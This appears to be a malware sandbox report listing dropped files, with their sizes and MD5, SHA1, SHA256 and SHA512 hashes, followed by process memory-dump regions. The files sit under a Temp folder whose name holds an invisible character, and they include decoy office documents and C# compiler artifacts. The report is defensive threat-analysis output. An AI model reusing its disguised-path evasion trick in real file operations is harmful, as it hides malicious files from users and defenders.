C:\Users\Admin\AppData\Local\Temp\ ‎ \Common Files\Desktop\PublishClose.docx

Filesize
12KB

MD5
e7230a6b85ddf06dfb15be8145d050e6

SHA1
c6029103562159231c79260f966a2686639fac0e

SHA256
fecb8eca1b2cce28c00923252b0fa962b1358befaa7fce5fe470fbadf0908db2

SHA512
eb88d531b5922b8c2ae790cb3a3d6daf90b3679f9712c6ad9ddaaab7b2685ad46c59aedb7a6ca2784cbdbd24870d1fdd9d0acb30ee6336f3e44ba536155dd93c

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ \Common Files\Desktop\ResumeRead.xlsx

Filesize
12KB

MD5
88e5c567339ca6bcb1bf36da30b17e7d

SHA1
dc91591166f174941f3e5109337c922ba9531444

SHA256
c5a265e00cb8bfed7d3e842fb9f8249c042271b03243fb6504f64b4d43a99366

SHA512
c1068218ba6ae9dd1022bad315756c887224afcb80d1cb6ba4f9f3b4a2b02edf92f2b487d4a6f9a3a5f84c7473a300931ba3bba3b4f513cb1393e9647a94154e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ \Common Files\Desktop\StepWait.xlsx

Filesize
15KB

MD5
11d07db57795622a2e3680dadb1f5695

SHA1
ea3a291b44539c5ab0ae7a53a602daa8afe73e09

SHA256
8959a973bd62c4bf616fc822982673e0764b51996fd2611eb78074652e21dbba

SHA512
b78e612ded3f2555036ed58f7d339436a7b7755da5e67f9514e2bcc7bbdedcbc879408d174f797a0a27a12bde2df54eda35b8f6ae7c96f8cbc908cd4c0e76134

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ \Common Files\Desktop\SyncReceive.xlsx

Filesize
9KB

MD5
feeefd63ec81c6c481b2c15826311c68

SHA1
7d43fb4963a9d44fd806b31a00e183fe144eccfe

SHA256
34ad12668d3642d17c3e955c9a7569da825ea03d08cda77400c3eb92c41c974a

SHA512
687422b98bcf60d2e5deb8c37a7385985c3d05f2dcaadc58ed7225ebf73cb7ebdf444b371257eb1ee5ec36422e40a14b1e8c2c37abdda912416bbc85e33f9ae0

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ \Common Files\Desktop\UninstallDeny.xlsx

Filesize
10KB

MD5
b34c06faea0f34997d42eaceca0a94ea

SHA1
e6e9aa36c1ac32d9b06b0e44768bc11119e73813

SHA256
605a235bea92a4f107471e8f0876fe178c4565b499db57569eb9e0781526eebb

SHA512
aa669d10c4cd8cc873b49e13f57458083bc377305e1910062b22b1fa142d3c5bd461e29dcb8bb485fb3aa523da67fe146e5fa778ccaea7f092b9d383f5deeb0d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ \Common Files\Documents\BlockUnlock.xls

Filesize
170KB

MD5
bcaabd8a03a9259a1f51691f60d47f6e

SHA1
c1782b93b245be6a82c4486a30c5d03144ed429a

SHA256
32c8e325b43ae2f63e56b0161bde67fc287f9543873b73e843b9a3f4484634e0

SHA512
4fd7f6539d9db8145929d7b2cf4b7464e69665e6ea161edcdb879ac93939535f753897ec5ed027615ef10734a74db84f945b581f341e0e57a740b983f86fe393

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ \Common Files\Documents\CompleteStep.xls

Filesize
227KB

MD5
d9648f277095698267538c9e4ec344e0

SHA1
72d986c86dd0c6173d0a4663f8b756500ee5ceda

SHA256
7f9a3a35b138929e1a042b26ee827660da611472fc8cb8df6e0d637c0bd03b37

SHA512
767189f2a8880c68c70c9f3d1a50d45136106a1c67c1412450fc171a5097bf6b33102e61bc0b7d532fcba5294bf92237a1f935f4e13b335130f06ff2f9d5f13f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ \Common Files\Documents\DenySave.doc

Filesize
307KB

MD5
4d8c9516e5774c0eeaf0aa08f25e7e6e

SHA1
8febfa9da662cd6728467da6565a3e40fa8b0877

SHA256
42d37790f083d3a9d75b2ffa3d4b417d37f7860d8e6ed0704fd9ebb5241eee66

SHA512
7cf2306bcdf8801774cfc74a2f13201bd17207670bca04ab115c3a9b5c32b7d5baed44bdd70b47ceee9fe68c8220d566dc754ca4d4d853070ccd174c1e4c6128

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ \Common Files\Documents\DisconnectExport.pdf

Filesize
341KB

MD5
1943131ab36d7350f5c133446ba4b879

SHA1
52a0af623bf1c0ff5889f36150b55978fcffd56c

SHA256
6c213b36b1580246eff0a16cf24fe69f8ec62c13d0c22ecc8dc3b34c815c7dc2

SHA512
9b2f6c941c9c2eb4b8512346009fb583901ebee03b31b992958d443dbaf098313b97f13c8cd753b283017a00fe33e716a6edab87f9bd24b10a9a5bbf56d14c68

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\eonxuhqz\CSCBE375C933AC64FE592D32565D25767BD.TMP

Filesize
652B

MD5
e2f14d678abb9dab7ef3ef63ea05395e

SHA1
fdf1785d7647e3e22eb12b6641b5c649263a1efe

SHA256
bbeb5fd0fc6e890437e888f4064dac737b86634547dbb22168c59457ace388b9

SHA512
a9e8ba5004b40308040f8d1106780d72e9da520615dbdf28f69e3cce4b9b45ced7d1daa67d493072116952b2952a5becace6551f2f36e17979f5e46c4f3b5630

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\eonxuhqz\eonxuhqz.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\eonxuhqz\eonxuhqz.cmdline

Filesize
607B

MD5
c6d939b2194d63a5cb0fb4d1a1e17f85

SHA1
3529f1042af7f8566882ed5c438b33bdbd354643

SHA256
4356f4f7672fa417145ab97c308ed0a92b9bbdc11a033e2222060d5c833c8c9c

SHA512
55f6d26c7d7d88286f240d0aa2062001c6e9ff79af1ea60c137ef32b09f2eddfd2f0f7e342c13938b3cd951dbd75edda21ec71a2d1cfc88ecf8ac6ccb9a872f6

Download Submit
memory/536-72-0x00007FF6DEE80000-0x00007FF6DEECF000-memory.dmp

Filesize
316KB

Download
memory/536-401-0x00007FF6DEE80000-0x00007FF6DEECF000-memory.dmp

Filesize
316KB

Download
memory/536-5-0x00007FF6DEE80000-0x00007FF6DEECF000-memory.dmp

Filesize
316KB

Download
memory/2596-76-0x00007FF6DEE80000-0x00007FF6DEECF000-memory.dmp

Filesize
316KB

Download
memory/2596-367-0x00007FFB402A0000-0x00007FFB403BC000-memory.dmp

Filesize
1.1MB

Download
memory/2596-27-0x00007FFB2E7E0000-0x00007FFB2EDD2000-memory.dmp

Filesize
5.9MB

Download
memory/2596-386-0x00007FFB3FB20000-0x00007FFB40049000-memory.dmp

Filesize
5.2MB

Download
memory/2596-387-0x00007FFB493B0000-0x00007FFB493BD000-memory.dmp

Filesize
52KB

Download
memory/2596-83-0x00007FFB2E7E0000-0x00007FFB2EDD2000-memory.dmp

Filesize
5.9MB

Download
memory/2596-23-0x00007FF6DEE80000-0x00007FF6DEECF000-memory.dmp

Filesize
316KB

Download
memory/2596-84-0x00007FFB45750000-0x00007FFB45764000-memory.dmp

Filesize
80KB

Download
memory/2596-85-0x00007FFB402A0000-0x00007FFB403BC000-memory.dmp

Filesize
1.1MB

Download
memory/2596-86-0x00007FFB493B0000-0x00007FFB493BD000-memory.dmp

Filesize
52KB

Download
memory/2596-87-0x00007FFB444A0000-0x00007FFB444C4000-memory.dmp

Filesize
144KB

Download
memory/2596-74-0x000001AB4DF20000-0x000001AB4E449000-memory.dmp

Filesize
5.2MB

Download
memory/2596-75-0x00007FFB3FB20000-0x00007FFB40049000-memory.dmp

Filesize
5.2MB

Download
memory/2596-73-0x00007FFB40760000-0x00007FFB4082D000-memory.dmp

Filesize
820KB

Download
memory/2596-68-0x00007FFB432A0000-0x00007FFB432D3000-memory.dmp

Filesize
204KB

Download
memory/2596-66-0x00007FFB494A0000-0x00007FFB494AD000-memory.dmp

Filesize
52KB

Download
memory/2596-64-0x00007FFB46400000-0x00007FFB46419000-memory.dmp

Filesize
100KB

Download
memory/2596-62-0x00007FFB403C0000-0x00007FFB4053E000-memory.dmp

Filesize
1.5MB

Download
memory/2596-60-0x00007FFB44470000-0x00007FFB44493000-memory.dmp

Filesize
140KB

Download
memory/2596-59-0x00007FFB48C50000-0x00007FFB48C69000-memory.dmp

Filesize
100KB

Download
memory/2596-56-0x00007FFB444D0000-0x00007FFB444FD000-memory.dmp

Filesize
180KB

Download
memory/2596-330-0x00007FFB44470000-0x00007FFB44493000-memory.dmp

Filesize
140KB

Download
memory/2596-350-0x00007FFB403C0000-0x00007FFB4053E000-memory.dmp

Filesize
1.5MB

Download
memory/2596-50-0x00007FFB493F0000-0x00007FFB493FF000-memory.dmp

Filesize
60KB

Download
memory/2596-364-0x00007FFB3FB20000-0x00007FFB40049000-memory.dmp

Filesize
5.2MB

Download
memory/2596-368-0x00007FFB46400000-0x00007FFB46419000-memory.dmp

Filesize
100KB

Download
memory/2596-363-0x00007FFB40760000-0x00007FFB4082D000-memory.dmp

Filesize
820KB

Download
memory/2596-353-0x00007FFB2E7E0000-0x00007FFB2EDD2000-memory.dmp

Filesize
5.9MB

Download
memory/2596-362-0x00007FFB432A0000-0x00007FFB432D3000-memory.dmp

Filesize
204KB

Download
memory/2596-354-0x00007FFB444A0000-0x00007FFB444C4000-memory.dmp

Filesize
144KB

Download
memory/2596-369-0x000001AB4DF20000-0x000001AB4E449000-memory.dmp

Filesize
5.2MB

Download
memory/2596-371-0x00007FFB2E7E0000-0x00007FFB2EDD2000-memory.dmp

Filesize
5.9MB

Download
memory/2596-370-0x00007FF6DEE80000-0x00007FF6DEECF000-memory.dmp

Filesize
316KB

Download
memory/2596-397-0x00007FFB40760000-0x00007FFB4082D000-memory.dmp

Filesize
820KB

Download
memory/2596-399-0x00007FFB402A0000-0x00007FFB403BC000-memory.dmp

Filesize
1.1MB

Download
memory/2596-49-0x00007FFB444A0000-0x00007FFB444C4000-memory.dmp

Filesize
144KB

Download
memory/2596-398-0x00007FFB45750000-0x00007FFB45764000-memory.dmp

Filesize
80KB

Download
memory/2596-396-0x00007FFB432A0000-0x00007FFB432D3000-memory.dmp

Filesize
204KB

Download
memory/2596-395-0x00007FFB494A0000-0x00007FFB494AD000-memory.dmp

Filesize
52KB

Download
memory/2596-394-0x00007FFB46400000-0x00007FFB46419000-memory.dmp

Filesize
100KB

Download
memory/2596-393-0x00007FFB403C0000-0x00007FFB4053E000-memory.dmp

Filesize
1.5MB

Download
memory/2596-392-0x00007FFB44470000-0x00007FFB44493000-memory.dmp

Filesize
140KB

Download
memory/2596-391-0x00007FFB48C50000-0x00007FFB48C69000-memory.dmp

Filesize
100KB

Download
memory/2596-390-0x00007FFB444D0000-0x00007FFB444FD000-memory.dmp

Filesize
180KB

Download
memory/2596-389-0x00007FFB493F0000-0x00007FFB493FF000-memory.dmp

Filesize
60KB

Download
memory/2596-388-0x00007FFB444A0000-0x00007FFB444C4000-memory.dmp

Filesize
144KB

Download
memory/3424-247-0x0000022DB7510000-0x0000022DB7518000-memory.dmp

Filesize
32KB

Download
memory/4156-96-0x000001F514A40000-0x000001F514A62000-memory.dmp

Filesize
136KB

Download